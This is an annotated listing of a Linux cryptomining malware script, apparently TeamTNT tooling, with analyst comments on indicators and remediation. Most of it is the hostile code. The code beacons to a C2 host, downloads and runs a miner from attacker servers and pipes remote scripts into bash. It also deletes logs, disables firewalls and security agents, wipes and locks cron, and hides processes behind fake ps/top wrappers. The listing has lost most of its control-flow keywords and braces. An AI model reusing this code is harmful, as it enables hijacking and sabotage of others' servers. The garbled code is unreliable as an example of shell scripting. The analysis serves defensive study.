# Mining script discovered by inspecting the crontab (cat /etc/crontab)
#!/bin/bash
# Analysis note: this listing has lost most of its control-flow keywords
# (then/fi/else/done and closing braces), so the grouping of the if/for
# bodies below is inferred from context, not from what the text shows.
#
# Stage 1 — check-in and host preparation.
# Beacon: the output of `id` is sent to the operator host as a URL path.
# Detection: outbound HTTP to oracle.zzhreceive.top with an "/idcheck/" path.
us=$(id)
curl "http://oracle.zzhreceive.top/b2f628/idcheck/$us" >>/dev/null
ulimit -n 65535
# Install directory for the miner. The miner binary, its config and its log
# are all stored under /usr/share with a literal "[crypto]" name.
export MOHOME=/usr/share
mkdir $MOHOME -p
# Re-run guard: the mtime of the miner log is used as a liveness signal —
# a log older than 600 s is treated as "miner not running".
# Artifact: /usr/share/[crypto].log
if [ -f "$MOHOME/[crypto].log" ]
echo "process possible running"
current=$(date +%s)
last_modified=$(stat -c "%Y" $MOHOME/[crypto].log)
if [ $(($current-$last_modified)) -gt 600 ]; then
echo "no miner process running";
echo "miner process running"
exit 1
echo "miner process not running"
# Anti-forensics and defence evasion: syslog is deleted, the ufw firewall is
# disabled and iptables rules are flushed, the NMI watchdog is turned off
# (also made persistent via /etc/sysctl.conf).
# Detection: missing /var/log/syslog, empty iptables ruleset, unexpected
# "kernel.nmi_watchdog=0" line appended to /etc/sysctl.conf.
rm -rf /var/log/syslog
chattr -iua /tmp/
chattr -iua /var/tmp/
ufw disable
iptables -F
sudo sysctl kernel.nmi_watchdog=0
sysctl kernel.nmi_watchdog=0
echo '0' >/proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
# Immutable/append-only attributes are stripped from root's SSH directory so
# later stages can modify it; review authorized_keys on affected hosts.
chattr -iae /root/.ssh/
chattr -iae /root/.ssh/authorized_keys
rm -rf /tmp/addres*
rm -rf /tmp/walle*
rm -rf /tmp/keys
# Cloud security-agent removal: Alibaba Cloud (aliyun/aegis, bcm-agent) and
# Tencent Cloud (yunjing/stargate/barad) agents are uninstalled and their
# services disabled. Detection: agent heartbeat loss in the cloud console,
# package-manager logs showing "bcm-agent" removal.
if ps aux | grep -i '[a]liyun'; then
curl http://update.aegis.aliyun.com/download/uninstall.sh | bash
curl http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*
systemctl stop aliyun.service
systemctl disable aliyun.service
service bcm-agent stop
yum remove bcm-agent -y
apt-get remove bcm-agent -y
elif ps aux | grep -i '[y]unjing'; then
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
# Mandatory access control is disabled (SELinux set permissive now and
# disabled in config; AppArmor stopped). Detection: SELINUX=disabled written
# to /etc/selinux/config, apparmor unit disabled.
setenforce 0
echo SELINUX=disabled >/etc/selinux/config
service apparmor stop
systemctl disable apparmor
service aliyun.service stop
systemctl disable aliyun.service
ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %
rm -rf /usr/local/aegis
# Indicators of compromise (all taken from this script): payload host
# 85.214.149.236 serving over TCP/443 in plain HTTP with .jpg-named archives,
# the C2 domain oracle.zzhreceive.top, and the Monero wallet below.
# The miner config is fetched as "cf.jpg"; both config URLs are identical.
MOxmrigMOD=http://85.214.149.236:443/sugarcrm/themes/default/images/mod.jpg
MOxmrigSTOCK=http://85.214.149.236:443/sugarcrm/themes/default/images/stock.jpg
miner_url=https://github.com/xmrig/xmrig/releases/download/v6.10.0/xmrig-6.10.0-linux-static-x64.tar.gz
miner_url_backup=http://oracle.zzhreceive.top/b2f628/father.jpg
config_url=http://oracle.zzhreceive.top/b2f628/cf.jpg
config_url_backup=http://oracle.zzhreceive.top/b2f628/cf.jpg
WALLET=43Xbgtym2GZWBk87XiYbCpTKGPBTxYZZWi44SWrkqqvzPZV6Pfmjv3UHR6FDwvPgePJyv9N5PepeajfmKp1X71EW7jx4Tpz.crondk3
VERSION=2.9
# FixTheSystem: re-enables core binaries (chmod, chattr, apt, yum, kill,
# shutdown, ...) by stripping the immutable bit and restoring the execute
# permission, then re-applies +i to each one. `tntrecht` is a renamed copy of
# chattr that KILLMININGSERVICES creates at /usr/bin/tntrecht; its presence
# on a host is itself an indicator. The closing brace of this function is
# not present in the listing.
# Detection: `lsattr` showing +i on package-manager and kill binaries,
# setfacl entries on /bin/chmod.
function FixTheSystem(){
echo "begin FixTheSystem"
tntrecht -i /bin/chmod || chattr -i /bin/chmod
setfacl -m u::x /bin/chmod
tntrecht -i /bin/chattr || chattr -i /bin/chattr
chmod +x /bin/chattr || setfacl -m u::x /bin/chattr
SYSFILEARRAY=(/usr/bin/apt /usr/bin/apt-get /bin/yum /bin/kill /usr/lib/klibc/bin/kill /usr/bin/pkill /bin/pkill /sbin/shutdown /sbin/reboot /sbin/poweroff /sbin/telinit)
for SYSFILEBIN in ${SYSFILEARRAY[@]}; do
tntrecht -i $SYSFILEBIN
chattr -i $SYSFILEBIN
setfacl -m u::x /bin/chmod
setfacl -m u::x $SYSFILEBIN
chmod +x $SYSFILEBIN
# The binaries are left immutable after repair, which blocks package
# upgrades of these files until the attribute is cleared.
chattr +i $SYSFILEBIN
tntrecht +i $SYSFILEBIN
# Immutable bits are also removed recursively from credential and SSH
# configuration paths, presumably so later stages can edit them — the
# unquoted "/home/*/.ssh/" entry is glob-expanded only on iteration.
SYSTEMFILEARRAY=("/root/.ssh/" "/home/*/.ssh/" "/etc/passwd" "/etc/shadow" "/etc/sudoers" "/etc/ssh/" "/etc/ssh/sshd_config")
for SYSTEMFILE in ${SYSTEMFILEARRAY[@]}; do
tntrecht -iR $SYSTEMFILE 2>/dev/null 1>/dev/null
chattr -iR $SYSTEMFILE 2>/dev/null 1>/dev/null
setfacl -m u::x /bin/chmod
# kill_miner_proc: evicts other tooling from the host. Processes tied to the
# listed IPs/names are killed, a set of well-known file paths under /tmp and
# /etc is overwritten with a one-byte or empty placeholder and made immutable
# (so nothing else can recreate them), matching Docker containers and images
# are removed, and every cron location is wiped. The function body is not
# closed in the listing; the call at the end is assumed to follow it.
# Detection: immutable near-empty files at the paths listed below
# (`lsattr -a /tmp /etc | grep -- '-i'`), and a `pkill -f` with no pattern
# below that leaves a usage error in any captured stderr.
kill_miner_proc()
netstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 %
pkill -f 121.42.151.137
pkill -f init12.cfg
pkill -f nginxk
# Missing pattern argument — pkill prints usage and exits non-zero here.
pkill -f
chattr -iau /tmp/lok
chmod +700 /tmp/lok
rm -rf /tmp/lok
sleep 1
# Placeholder files: each path is unlocked, replaced with "1" or emptied,
# then locked with +i (and +a where shown). These are durable on-disk
# artifacts that survive a reboot.
chattr -i /tmp/kdevtmpfsi
echo 1 > /tmp/kdevtmpfsi
chattr +i /tmp/kdevtmpfsi
sleep 1
chattr -i /tmp/redis2
echo 1 > /tmp/redis2
chattr +i /tmp/redis2
chattr -ia /.Xll/xr
>/.Xll/xr
chattr +ia /.Xll/xr
chattr -ia /etc/trace
>/etc/trace
chattr +ia /etc/trace
chattr -ia /etc/newsvc.sh
chattr -ia /etc/svc*
chattr -ia /tmp/newsvc.sh
chattr -ia /tmp/svc*
>/etc/newsvc.sh
>/etc/svcupdate
>/etc/svcguard
>/etc/svcworkmanager
>/etc/svcupdates
>/tmp/newsvc.sh
>/tmp/svcupdate
>/tmp/svcguard
>/tmp/svcworkmanager
>/tmp/svcupdates
chattr +ia /etc/newsvc.sh
chattr +ia /etc/svc*
chattr +ia /tmp/newsvc.sh
chattr +ia /tmp/svc*
sleep 1
chattr -ia /etc/phpupdate
chattr -ia /etc/phpguard
chattr -ia /etc/networkmanager
chattr -ia /etc/newdat.sh
>/etc/phpupdate
>/etc/phpguard
>/etc/networkmanager
>/etc/newdat.sh
chattr +ia /etc/phpupdate
chattr +ia /etc/phpguard
chattr +ia /etc/networkmanager
chattr +ia /etc/newdat.sh
chattr -ia /etc/zzh
chattr -ia /etc/newinit
>/etc/zzh
>/etc/newinit
chattr +ia /etc/zzh
chattr +ia /etc/newinit
sleep 1
# Note: this overwrites a path under /usr/lib/systemd, so package-integrity
# checks (rpm -V / debsums) will flag it.
chattr -i /usr/lib/systemd/systemd-update-daily
echo 1 > /usr/lib/systemd/systemd-update-daily
chattr +i /usr/lib/systemd/systemd-update-daily
#yum install -y docker.io || apt-get install docker.io;
# Container cleanup: any running container or image whose listing matches
# these substrings is killed/removed. Note that broad patterns such as
# "auto", "mine" and "registry" will also hit legitimate workloads.
docker ps | grep "pocosow" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "gakeaws" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "azulu" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "auto" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "xmr" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "mine" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "slowhttp" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "bash.shell" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "entrypoint.sh" | awk '{print $1}' | xargs -I % docker kill %
docker ps | grep "/var/sbin/bash" | awk '{print $1}' | xargs -I % docker kill %
docker images -a | grep "pocosow" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "gakeaws" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "buster-slim" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "hello-" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "azulu" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "registry" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "xmr" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "auto" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "mine" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "monero" | awk '{print $3}' | xargs -I % docker rmi -f %
docker images -a | grep "slowhttp" | awk '{print $3}' | xargs -I % docker rmi -f %
docker rm -f dockgeddon
#echo SELINUX=disabled >/etc/selinux/config
service apparmor stop
systemctl disable apparmor
service aliyun.service stop
systemctl disable aliyun.service
ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %
rm -rf /usr/local/aegis
# Cron wipe: all user crontabs, /etc/cron.d and /etc/crontab are deleted,
# which destroys legitimate scheduled jobs as well. Recover from backups or
# configuration management after cleanup.
chattr -R -ia /var/spool/cron
chattr -ia /etc/crontab
chattr -R -ia /etc/cron.d
chattr -R -ia /var/spool/cron/crontabs
crontab -r
rm -rf /var/spool/cron/*
rm -rf /etc/cron.d/*
rm -rf /var/spool/cron/crontabs
rm -rf /etc/crontab
kill_miner_proc
# kill_sus_proc: two sweeps over the process table. First, any process whose
# /proc/PID/exe resolves under /tmp is killed unless its cmdline contains
# "crypto"; second, any process at >= 40% CPU is killed on the same
# condition. This is how the miner keeps the CPU for itself: the "crypto"
# name is the allow-list. Note the first test uses `$? -ne 1`, so a grep
# error (exit 2, e.g. an unreadable exe link) is treated like a match.
# Detection: unexplained SIGKILL of high-CPU services; the body of this
# function is not closed in the listing and the call follows it.
kill_sus_proc()
ps axf -o "pid"|while read procid
ls -l /proc/$procid/exe | grep /tmp
if [ $? -ne 1 ]
cat /proc/$procid/cmdline| grep -a -E "crypto"
if [ $? -ne 0 ]
kill -9 $procid
echo "don't kill"
ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid
cat /proc/$procid/cmdline| grep -a -E "crypto"
if [ $? -ne 0 ]
kill -9 $procid
echo "don't kill"
kill_sus_proc
#FixTheSystem
# SetupNameServers: forces Google resolvers into /etc/resolv.conf and then
# makes the file immutable. Because `||` binds only to the first command on
# each line, the `echo ... >> /etc/resolv.conf` runs unconditionally — the
# grep -q guard does not prevent duplicate nameserver lines.
# Detection: /etc/resolv.conf with the +i attribute (DHCP/resolvconf updates
# will start failing), extra 8.8.8.8/8.8.4.4 entries. Remediation requires
# clearing the attribute before the file can be rewritten.
function SetupNameServers(){
grep -q 8.8.8.8 /etc/resolv.conf || chattr -i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.8.8" >> /etc/resolv.conf; chattr +i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht +i /etc/resolv.conf 2>/dev/null 1>/dev/null
grep -q 8.8.4.4 /etc/resolv.conf || chattr -i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.4.4" >> /etc/resolv.conf; chattr +i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht +i /etc/resolv.conf 2>/dev/null 1>/dev/null
SetupNameServers
# Top-level cron unlock and removal of the current user's crontab; repeated
# in clean_cron below.
chattr -iR /var/spool/cron/
tntrecht -iR /var/spool/cron/
crontab -r
# clean_cron: strips immutable/append-only attributes from every cron
# location (using both chattr and its tntrecht copy), removes the caller's
# crontab, and deletes all system and user cron files. Legitimate jobs are
# lost; the function is not closed in the listing and is called right after.
function clean_cron(){
chattr -R -ia /var/spool/cron
tntrecht -R -ia /var/spool/cron
chattr -ia /etc/crontab
tntrecht -ia /etc/crontab
chattr -R -ia /etc/cron.d
tntrecht -R -ia /etc/cron.d
chattr -R -ia /var/spool/cron/crontabs
tntrecht -R -ia /var/spool/cron/crontabs
crontab -r
rm -rf /var/spool/cron/*
rm -rf /etc/cron.d/*
rm -rf /var/spool/cron/crontabs
rm -rf /etc/crontab
clean_cron
# lock_cron: after the wipe, recreates an empty /etc/crontab and marks it
# and the cron directories immutable + append-only, so no other job (from
# admins or rival tooling) can be scheduled through cron.
# Detection: `lsattr -d /var/spool/cron /etc/cron.d /etc/crontab` showing
# "ia"; `crontab -e` failing with a permission error for root.
# Remediation: clear the attributes with a trusted chattr before restoring
# cron content. Function body not closed in the listing; called after.
function lock_cron()
chattr -R +ia /var/spool/cron
tntrecht -R +ia /var/spool/cron
touch /etc/crontab
chattr +ia /etc/crontab
tntrecht +ia /etc/crontab
chattr -R +ia /var/spool/cron/crontabs
tntrecht -R +ia /var/spool/cron/crontabs
chattr -R +ia /etc/cron.d
tntrecht -R +ia /etc/cron.d
lock_cron
# CheckAboutSomeKeys: reports whether SSH private keys or AWS credential
# files exist for root and home users. Only the presence is echoed here;
# the listing shows no exfiltration in this function. The "/home/*/..."
# tests are inside double quotes, so the glob is not expanded and those two
# checks look for a literal directory named "*" (they never match).
# Defender note: if this ran on a host, treat /root/.ssh/id_rsa and
# /root/.aws/credentials as exposed and rotate them.
function CheckAboutSomeKeys(){
if [ -f "/root/.ssh/id_rsa" ]
echo 'found: /root/.ssh/id_rsa'
if [ -f "/home/*/.ssh/id_rsa" ]
echo 'found: /home/*/.ssh/id_rsa'
if [ -f "/root/.aws/credentials" ]
echo 'found: /root/.aws/credentials'
if [ -f "/home/*/.aws/credentials" ]
echo 'found: /home/*/.aws/credentials'
CheckAboutSomeKeys
# Removes an older install of the same tooling at /usr/bin/TeamTNT/ and
# stops the "crypto" service it registered. The directory name is a useful
# historical indicator even when this branch does not fire.
if [ -f "/usr/bin/TeamTNT/[crypto]" ]
service crypto stop
rm -fr /usr/bin/TeamTNT/
# SecureTheSystem: user-space process hiding. /bin/ps, /bin/top and
# /bin/pstree are each moved to "<name>.original" and replaced by a two-line
# bash wrapper that pipes the real output through `grep -v "crypto\|scan"`,
# then the wrapper's mtime is backdated to 2016-08-25.
# Detection: `file /bin/ps` reporting a shell script instead of an ELF
# binary; the existence of /bin/ps.original, /bin/top.original,
# /bin/pstree.original; package verification (rpm -V procps-ng / debsums)
# failing on these paths. Use /bin/ps.original, `ls /proc`, or a statically
# linked copy from trusted media when triaging such a host.
# The e2fsprogs reinstall at the end depends on $chattr_size, which is never
# assigned in this listing, so that comparison errors out.
function SecureTheSystem(){
echo "begin SecureTheSystem"
if [ -f "/bin/ps.original" ]
echo "/bin/ps changed"
mv /bin/ps /bin/ps.original
echo "#! /bin/bash">>/bin/ps
echo "ps.original \$@ | grep -v \"crypto\|scan\"">>/bin/ps
chmod +x /bin/ps
touch -d 20160825 /bin/ps
echo "/bin/ps changing"
if [ -f "/bin/top.original" ]
echo "/bin/top changed"
mv /bin/top /bin/top.original
echo "#! /bin/bash">>/bin/top
echo "top.original \$@ | grep -v \"crypto\|scan\"">>/bin/top
chmod +x /bin/top
touch -d 20160825 /bin/top
echo "/bin/top changing"
if [ -f "/bin/pstree.original" ]
echo "/bin/pstree changed"
mv /bin/pstree /bin/pstree.original
echo "#! /bin/bash">>/bin/pstree
echo "pstree.original \$@ | grep -v \"crypto\|scan\"">>/bin/pstree
chmod +x /bin/pstree
touch -d 20160825 /bin/pstree
echo "/bin/pstree changing"
if [ -f "/bin/chattr" ]
chattrsize=`ls -l /bin/chattr | awk '{ print $5 }'`
# $chattr_size is undefined here (not set anywhere in the listing).
if [ "$chattrsize" -lt "$chattr_size" ]
yum -y remove e2fsprogs
yum -y install e2fsprogs
echo "no need install chattr"
yum -y remove e2fsprogs
yum -y install e2fsprogs
# LockDownTheSystem: makes shutdown/reboot/poweroff/telinit non-executable
# and immutable, marks /proc/sysrq-trigger immutable, and empties then
# deletes the systemd reboot target/service — i.e. it tries to stop an
# operator from rebooting the host out from under the miner.
# This function is not invoked anywhere in the visible listing (see the call
# list at the bottom). The `2>/dev/null 1>/dev/null` after the backtick
# assignment applies to the assignment, not to `which`.
# Remediation: clear +i on the listed binaries and reinstall the systemd
# package to restore reboot.target / systemd-reboot.service.
function LockDownTheSystem(){
LOCKDOWNARRAY=(shutdown reboot poweroff telinit)
for LOCKDOWN in ${LOCKDOWNARRAY[@]}; do
LOCKDOWNBIN=`which $LOCKDOWN` 2>/dev/null 1>/dev/null
chattr -i $LOCKDOWNBIN 2>/dev/null 1>/dev/null
tntrecht -i $LOCKDOWNBIN 2>/dev/null 1>/dev/null
chattr -x $LOCKDOWNBIN 2>/dev/null 1>/dev/null
#chmod 000 $LOCKDOWNBIN 2>/dev/null 1>/dev/null
chattr +i $LOCKDOWNBIN 2>/dev/null 1>/dev/null
tntrecht +i $LOCKDOWNBIN 2>/dev/null 1>/dev/null
chattr +i /proc/sysrq-trigger 2>/dev/null 1>/dev/null
tntrecht +i /proc/sysrq-trigger 2>/dev/null 1>/dev/null
LOCKDOWNFILES=("/lib/systemd/system/reboot.target" "/lib/systemd/system/systemd-reboot.service")
for LOCKDOWNFILE in ${LOCKDOWNFILES[@]}; do
chattr -i $LOCKDOWNFILE 2>/dev/null 1>/dev/null
tntrecht -i $LOCKDOWNFILE 2>/dev/null 1>/dev/null
chattr -x $LOCKDOWNFILE 2>/dev/null 1>/dev/null
> $LOCKDOWNFILE
rm -f $LOCKDOWNFILE 2>/dev/null 1>/dev/null
# KILLMININGSERVICES: removes competing miners and their containers, then
# plants a decoy in their place. Key defender-relevant behaviour:
#  * /usr/bin/tntrecht is created as a copy of the real chattr, after which
#    the original chattr binary is made non-executable and immutable. An
#    admin's `chattr` therefore fails on such a host; use a trusted copy
#    (e2fsprogs from install media or a static busybox) or the tntrecht copy
#    itself to undo the attributes.
#  * $LOCKFILE is base64 and appears to decode to a two-line bash stub that
#    prints a "Forbidden action" message; it is written over the paths of
#    other miners (/root/.tmp/*, /usr/sbin/cpumon, /usr/cpu) and locked +i.
# Detection: /usr/bin/tntrecht present; `ls -l $(command -v chattr)` with
# no execute bit; immutable scripts at the decoy paths listed below.
# The final line of this function is truncated in the listing ("1>/de").
function KILLMININGSERVICES(){
echo "[*] Removing previous miner (if any)"
if sudo -n true 2>/dev/null; then
sudo systemctl stop crypto.service
killall -9 xmrig
echo "do KILLMININGSERVICES"
# Container removal: each `$(docker rm ...)` runs the removal inside a
# command substitution whose (empty) output is then executed as a command.
$(docker rm $(docker ps | grep -v grep | grep "/bin/bash -c 'apt" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
#$(docker rm $(docker ps | grep -v grep | grep "/bin/bash" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep "/root/startup.sh" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep "widoc26117/xmr" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep "zbrtgwlxz" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
$(docker rm $(docker ps | grep -v grep | grep "tail -f /dev/null" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)
# Known rival-miner paths (docker-update, redis-backup, /tmp/moneroocean).
rm -f /usr/bin/docker-update 2>/dev/null 1>/dev/null
pkill -f /usr/bin/docker-update 2>/dev/null 1>/dev/null
killall -9 docker-update 2>/dev/null 1>/dev/null
rm -f /usr/bin/redis-backup 2>/dev/null 1>/dev/null
pkill -f /usr/bin/redis-backup 2>/dev/null 1>/dev/null
killall -9 redis-backup 2>/dev/null 1>/dev/null
rm -f /tmp/moneroocean/xmrig 2>/dev/null 1>/dev/null
pkill -f /tmp/moneroocean/xmrig 2>/dev/null 1>/dev/null
rm -fr /tmp/moneroocean/ 2>/dev/null 1>/dev/null
killall -9 xmrig 2>/dev/null 1>/dev/null
LOCKFILE='IyEvYmluL2Jhc2gKZWNobyAnRm9yYmlkZGVuIGFjdGlvbiAhISEgVGVhbVROVCBpcyB3YXRjaGluZyB5b3UhJw=='
# chattr hijack: copy chattr to /usr/bin/tntrecht, then disable the original.
if [ ! -f /usr/bin/tntrecht ]; then
chattrbin=`which chattr`
cp $chattrbin /usr/bin/tntrecht 2>/dev/null 1>/dev/null
chmod +x /usr/bin/tntrecht 2>/dev/null 1>/dev/null
chmod -x $chattrbin 2>/dev/null 1>/dev/null
tntrecht +i $chattrbin 2>/dev/null 1>/dev/null
LOCKFILE='IyEvYmluL2Jhc2gKZWNobyAnRm9yYmlkZGVuIGFjdGlvbiAhISEgVGVhbVROVCBpcyB3YXRjaGluZyB5b3UhJw=='
# Replace a rival install under /root/.tmp with the locked decoy stub.
if [ -f /root/.tmp/xmrig ]; then
chattr -iR /root/.tmp/ 2>/dev/null 1>/dev/null
tntrecht -iR /root/.tmp/ 2>/dev/null 1>/dev/null
tmpxmrig=("/root/.tmp/config.json" "/root/.tmp/config_background.json" "/root/.tmp/xmrig.log" "/root/.tmp/miner.sh" "/root/.tmp/xmrig")
for tmpxmrigfile in ${tmpxmrig[@]}; do
rm -f $tmpxmrigfile 2>/dev/null 1>/dev/null
pkill -f $tmpxmrigfile 2>/dev/null 1>/dev/null
kill $(pidof $tmpxmrigfile) 2>/dev/null 1>/dev/null
echo $LOCKFILE | base64 -d > $tmpxmrigfile
chmod +x $tmpxmrigfile 2>/dev/null 1>/dev/null
chattr +i $tmpxmrigfile 2>/dev/null 1>/dev/null
tntrecht +i $tmpxmrigfile 2>/dev/null 1>/dev/null
pkill -f $tmpxmrigfile 2>/dev/null 1>/dev/null
kill $(pidof $tmpxmrigfile) 2>/dev/null 1>/dev/null
killall $tmpxmrigfile 2>/dev/null 1>/dev/null
chmod -x /root/.tmp/xmrig 2>/dev/null 1>/dev/null
rm -f /root/.tmp/xmrig 2>/dev/null 1>/dev/null
chattr +i /root/.tmp/xmrig 2>/dev/null 1>/dev/null
tntrecht +i /root/.tmp/xmrig 2>/dev/null 1>/dev/null
pkill -f /root/.tmp/xmrig 2>/dev/null 1>/dev/null
ps ax| grep xmrig 2>/dev/null 1>/dev/null
# Same treatment for the cpumon variant.
if [ -f /usr/sbin/cpumon ]; then
cpumonxmr=("/usr/sbin/cpumon" "/usr/cpu")
for cpumonfile in ${cpumonxmr[@]}; do
chattr -i $cpumonfile 2>/dev/null 1>/dev/null
tntrecht -i $cpumonfile 2>/dev/null 1>/dev/null
rm -f $cpumonfile 2>/dev/null 1>/dev/null
pkill -f $cpumonfile 2>/dev/null 1>/dev/null
kill $(pidof $cpumonfile) 2>/dev/null 1>/dev/null
echo $LOCKFILE | base64 -d > $cpumonfile
chmod +x $cpumonfile 2>/dev/null 1>/dev/null
chattr +i $cpumonfile 2>/dev/null 1>/dev/null
tntrecht +i $cpumonfile 2>/dev/null 1>/dev/null
pkill -f $cpumonfile 2>/dev/null 1>/dev/null
kill $(pidof $cpumonfile) 2>/dev/null 1>/dev/null
killall $cpumonfile 2>/dev/null 1>/dev/null
if [ -f /opt/server ]; then
chattr -i /opt/server 2>/dev/null 1>/dev/null
tntrecht -i /opt/server 2>/dev/null 1>/dev/null
rm -f /opt/server 2>/dev/null 1>/dev/null
pkill -f /opt/server 2>/dev/null 1>/dev/null
kill $(pidof /opt/server) 2>/dev/null 1>/dev/null
if [ -f /tmp/log_rotari ]; then
chattr -i /tmp/log_rotari 2>/dev/null 1>/dev/null
tntrecht -i /tmp/log_rotari 2>/dev/null 1>/dev/null
rm -f /tmp/log_rotari 2>/dev/null 1>/dev/null
pkill -f /tmp/log_rotari 2>/dev/null 1>/dev/null
kill $(pidof /tmp/log_rotari) 2>/dev/null 1>/dev/null
# If a /root/.tmp00/bash process is found, root's crontab file is blanked
# and removed as well.
BASH00=$(ps ax | grep -v grep | grep "/root/.tmp00/bash")
if [ ! -z "$BASH00" ];
chattr -i /var/spool/cron/root 2>/dev/null 1>/dev/null
tntrecht -i /var/spool/cron/root 2>/dev/null 1>/dev/null
chmod 1777 /var/spool/cron/root 2>/dev/null 1>/dev/null
chmod -x /var/spool/cron/root 2>/dev/null 1>/dev/null
echo " " > /var/spool/cron/root 2>/dev/null 1>/dev/null
rm -f /var/spool/cron/root 2>/dev/null 1>/dev/null
chattr -i /root/.tmp00/bash 2>/dev/null 1>/dev/null
tntrecht -i /root/.tmp00/bash 2>/dev/null 1>/dev/null
chmod -x /root/.tmp00/bash 2>/dev/null 1>/de
# SetupMoneroOcean: installs and persists the miner. On-disk and network
# artifacts to look for (all taken from the lines below):
#  * Download of "mod.jpg"/"stock.jpg" from 85.214.149.236:443 (HTTP, not
#    TLS, on port 443) or of xmrig 6.10.0 from GitHub, unpacked into
#    /usr/share and renamed to /usr/share/[crypto].
#  * Miner config stored as /usr/share/[crypto].pid (a .pid name holding
#    JSON) and /usr/share/config_background.json; pool endpoint
#    xmr-asia1.nanopool.org:14444; log at /usr/share/[crypto].log; syslog
#    output enabled, so miner lines also land in the system journal.
#  * Persistence: a line in /root/.profile (only when sudo is NOT
#    available, note the inverted `! sudo -n true`) and a systemd unit at
#    /etc/systemd/system/crypto.service (Description "crypto system
#    service", Restart=always, Nice=10).
#  * vm.nr_hugepages appended to /etc/sysctl.conf when MemTotal is large.
# Remediation: stop/disable crypto.service, remove the unit file, the
# /root/.profile line and everything named [crypto]* under /usr/share,
# and revert the sysctl.conf changes. Neither function below is closed in
# the listing; SetupMoneroOcean1 is nested inside SetupMoneroOcean.
function SetupMoneroOcean(){
function SetupMoneroOcean1(){
# printing intentions
echo "[*] Downloading MoneroOcean advanced version of xmrig to /tmp/xmrig.tar.gz"
if ! curl -L --progress-bar "$MOxmrigMOD" -o /tmp/xmrig.tar.gz; then
echo "ERROR: Can't download $MOxmrigMOD file to /tmp/xmrig.tar.gz"
exit 1
echo "[*] Unpacking /tmp/xmrig.tar.gz to $MOHOME/"
[ -d $MOHOME/ ] || mkdir $MOHOME/
if ! tar xf /tmp/xmrig.tar.gz -C $MOHOME/; then
echo "ERROR: Can't unpack /tmp/xmrig.tar.gz to $MOHOME/ directory"
exit 1
rm /tmp/xmrig.tar.gz
echo "[*] Checking if advanced version of $MOHOME/xmrig works fine (and not removed by antivirus software)"
# The miner's donation level is zeroed in the config file.
sed -i 's/"donate-level": *[^,]*,/"donate-level": 0,/' $MOHOME/[crypto].pid
$MOHOME/[crypto] --help >/dev/null
if (test $? -ne 0); then
if [ -f $MOHOME/[crypto] ]; then
echo "WARNING: Advanced version of $MOHOME/xmrig is not functional"
echo "WARNING: Advanced version of $MOHOME/xmrig was removed by antivirus (or some other problem)"
echo "[*] Looking for the latest version of Monero miner"
#LATEST_XMRIG_RELEASE=`curl -s https://github.com/xmrig/xmrig/releases/latest | grep -o '".*"' | sed 's/"//g'`
LATEST_XMRIG_LINUX_RELEASE=$MOxmrigSTOCK
echo "[*] Downloading $LATEST_XMRIG_LINUX_RELEASE to /tmp/xmrig.tar.gz"
if ! curl -L --progress-bar $LATEST_XMRIG_LINUX_RELEASE -o /tmp/xmrig.tar.gz; then
echo "ERROR: Can't download $LATEST_XMRIG_LINUX_RELEASE file to /tmp/xmrig.tar.gz"
exit 1
echo "[*] Unpacking /tmp/xmrig.tar.gz to $MOHOME/"
if ! tar xf /tmp/xmrig.tar.gz -C $MOHOME/ --strip=1; then
echo "WARNING: Can't unpack /tmp/xmrig.tar.gz to $MOHOME/ directory"
rm /tmp/xmrig.tar.gz
echo "[*] Checking if stock version is OKAY!"
sed -i 's/"donate-level": *[^,]*,/"donate-level": 0,/' $MOHOME/[crypto].pid
$MOHOME/[crypto] --help >/dev/null
if (test $? -ne 0); then
if [ -f $MOHOME/[crypto] ]; then
echo "ERROR: Stock version of $MOHOME/[crypto] is not functional too"
echo "ERROR: Stock version of $MOHOME/[crypto] was removed by antivirus too"
exit 1
echo "[*] $MOHOME/[crypto] is OK"
